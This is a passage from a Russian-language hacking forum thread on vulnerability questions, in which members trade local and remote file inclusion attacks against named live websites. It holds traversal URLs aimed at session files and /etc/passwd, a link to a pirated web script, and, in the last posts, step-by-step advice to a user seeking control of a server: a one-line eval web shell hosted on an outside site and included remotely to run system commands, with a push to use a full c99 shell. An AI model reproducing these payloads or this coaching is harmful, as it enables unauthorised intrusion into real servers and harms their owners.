Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Grey, просто многие относят file() и file_get_contents() к инклудам
     
    1 person likes this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Кстати, был тут человек в моа, Нитрокс, старички помнят. Вот мы с ним около года назад тоже спорили по поводу инклудов. Он ещё считал что при инклуде не любой файл будет выполняться как пшп-код. Так что это заблуждение очень распространено, а уж про читалки файлов я вообще молчу
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Grey:

    Code:
    http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../tmp/sess_0quou9ch5ubkmtpv5cuotojhd7%00
    
    Как бы дальше типо достаточно что-то купить типо, указать мыло и прочее и обойти фильтр
     
  4. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    и?
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    да хз пока что и:))) Задавили авторитетом, был неправ, погорячился

    ЗЫЖ Наверное
     
  6. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Хм, может ты нам по коду покажешь где ты там include() увидел?

    http://www.cyl.ru/index.php?page=3&lang=../index.php%00
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    )) Да, там file, готов понести самое жестокое наказание и впредь думать, прежде чем писать

    Grey: ну тогда начинай подготовку к наказанию - запасись хАААрошей клизмой.
     
    #7547 Pashkela, 14 Jun 2009
    Last edited by a moderator: 14 Jun 2009
    1 person likes this.
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ,кто-нибудь может показать пример обхода инклуда на этом сайте?

    http://www.alertsite.com/phplive/image.php?l=ml'&x=1&deptid=0

    Классический пример имхо
    Переменная l
     
  9. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    allow_url_fopen.Не ? В статье какой-то было.Сюда относят функции: file(),file_get_contents(),fopen(),popen().Вроде все.Если стоит эта директива в ON,то можно использовать.
     
  10. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    и что ты с этим сделаешь? прочитаешь код своего шелленга удалённого? :D
    разве что еси в саенте eval(file($_GET[blablabla])); ну или систем(file($_GET[blablabla]); .......
     
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Мде...как-то не подумал.Но какие-то преимущества давались,блин...
     
  12. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Warning: getimagesize(/usr/virtualweb/netdirekt.de/html/c/cms/images/index_-over.jpg): failed to open stream: No such file or directory in /usr/virtualweb/netdirekt.de/html/c/cms/front_content.php(884) : eval()'d code on line 520

    Здесь,я так понял,ничего не сделаешь)

    http://www.netdirect.de/c/cms/front_content.php?idart=132&idcat=../../../../../../../../../../etc/passwd%00

    PHP:
    Warningauth_loginform(http://neu.netdirekt.de/c/cms/front_crcloginform.inc.php): failed to open stream: no suitable wrapper could be found in /usr/virtualweb/netdirekt.de/html/c/conlib/local.php on line 654
    PHP:
    Warningauth_loginform(): URL file-access is disabled in the server configuration in /usr/virtualweb/netdirekt.de/html/c/conlib/local.php on line 654
    Какой смысл отрубать allow_url_fopen() тогда,если это не влечёт проблем с безопасностью ? Прихоть такая чтоли ?
     
    #7552 Велемир, 15 Jun 2009
    Last edited: 15 Jun 2009
  13. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    очень понятно расписано, особенно для обожателей с99шелла ;) :D :
     
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Какой смысл отрубать allow_url_fopen() тогда,если это не влечёт проблем с безопасностью ? Прихоть такая чтоли ?

    до каких то там версий пшп (5.0.* чёто такое) allow_url_fopen растространялось и на file() и на include(), потом ввели allow_url_include
     
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    allow_url_include "0" PHP_INI_ALL PHP_INI_SYSTEM in PHP 5. Available since PHP 5.2.0.
     
    #7555 Spyder, 15 Jun 2009
    Last edited: 15 Jun 2009
  16. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Вот эта статья https://forum.antichat.ru/thread91807.html


    Сделай так

    http://www.alertsite.com/phplive/image.php?l=image.php/./.[...]/././.

    Будет

    Это phplive, там фильтрация+file_exists+is_dir. Вот этот двиг нулленный - http://rapidshare.com/files/86879595/Phplive.3.2.2.NULLED-FiXED-LOGOUT.rar
    смотри сурс image.php, там правда закоментили кусок кода (видимо химичили пока делали нулл), но сайте все работает
     
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Тык инклуд работает ?)
     
  18. main()

    main() Banned

    Joined:
    10 Jun 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    1
    Люди подскажите плиз. нашол сайт с пхп инклудом. зарегал хостинг, скрипт на пхп написал такой.

    <?php
    print("<h3>SHELL</h3>");
    print(system("ls -al"));
    ?>

    подставил так

    http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.php
    отобразилось токо слов SHELL.

    Подскажите, как взять сервак под контроль?
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Обычный RFI, заливаешь УЖЕ полноценный шелл хоть на народ.ру и просто указываешь ссылку на него - только что проверил на с99-шелле

    Но если ты так любишь извращения, то залей на народ.ру (свой сайт) такой eval.txt:

    PHP:
    <?=eval($_GET[c])?>
    и потом подключи вот так:
    Code:
    http://catenabrasil.com/portal/index.php?arq=http://ник_на_народе.narod.ru/eval.txt&c=phpinfo();
    
    http://catenabrasil.com/portal/index.php?arq=http://ник_на_народе.narod.ru/eval.txt&c=system('ls%20-la');
    
    но в последнем случае пишет:
    Code:
    Warning: system() has been disabled for security reasons
    
    так что не парься и подключай нормальный шелл сразу:)
     
    #7559 Pashkela, 15 Jun 2009
    Last edited: 15 Jun 2009
  20. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Подскажите программы,работающие независимо друг друга:
    1. Для автоматизированного подбора полей.
    2. Для автоматизированного подбора столбцов.
    3. Для брута имен столбцов.

    SIPT 4.0 НЕ ПОДХОДИТ))
     
Thread Status:
Not open for further replies.